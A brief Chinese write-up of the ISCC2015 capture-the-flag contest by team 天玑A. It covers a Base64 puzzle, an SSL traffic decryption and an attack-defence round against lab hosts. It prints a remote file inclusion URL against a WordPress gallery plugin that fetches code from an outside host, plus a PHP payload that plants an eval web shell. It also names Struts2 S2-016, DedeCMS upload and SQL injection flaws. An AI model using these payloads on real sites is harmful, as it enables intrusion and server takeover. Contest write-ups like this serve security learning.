ISCC2015-天玑A

选择题

慢慢做,不着急

分还是挺多的

关卡题

只有两个

BASIC2:莫名其妙的字符串

        给出一个小写和数字混合字符串,词频分析后既不是单表替换,没有提示,同时也不符合其他古典密码规律,根据以往经验,猜测是一串Base64,于是尝试修改大小写,发现了flag字符串,确定后根据base64的编码规律写一个程序分组爆破明文,得到flag

REVERSE-迷茫的嗅探器

        pacp包是SSL加密过的,虽然给出了私钥文件,但是经过OpenSSL加密,使用kali中的OpenSSL解密私钥后得到真实私钥,密码为弱口令123456。

 

        然后再WireShark中加载私钥文件后即可恢复数据包明文,搜索所有POST内容后发现管理员修改的密码,即为Flag

PS:第一个包是用错误密码登陆,之后改了一次密码

攻防

Setp 1 拓扑

nmap

Wordpress:

192.168.4.x,192.168.8.x,...,192.168.52.x

DedeCMS:  

192.168.237.x

Struct2:

192.168.237.x:8080

192.168.4.x,...,192.168.8.x,...

It works:

ResourceSpace:

192.168.237.x

OtherPorts:

5555,445,135,21,...

Setp 2 漏洞扫描与利用

many

Wordpress:

192.168.4.x,192.168.8.x,...,192.168.52.x

http://192.168.32.20/wordpress/wp-content/plugins/mygallery/
myfunctions/mygallerybrowser.php?myPath=http://173.17.0.78/6.txt?
<?php
	fputs(fopen('1.php','w+'),'<?php @eval($_POST["hehe"])?>');
?>

Setp 2 漏洞扫描与利用

many

S2-016

Struct2:

192.168.237.x

Setp 2 漏洞扫描与利用

many

DedeCMS:  

192.168.237.x

会员中心头像上传漏洞

变量覆盖

还有一个

Setp 2 漏洞扫描与利用

many

192.168.237.x

SQLI

ResourceSpace:

Setp 3 提权保住shell

NULL

OVER

Text

天玑A-

By lc

天玑A-

  • 747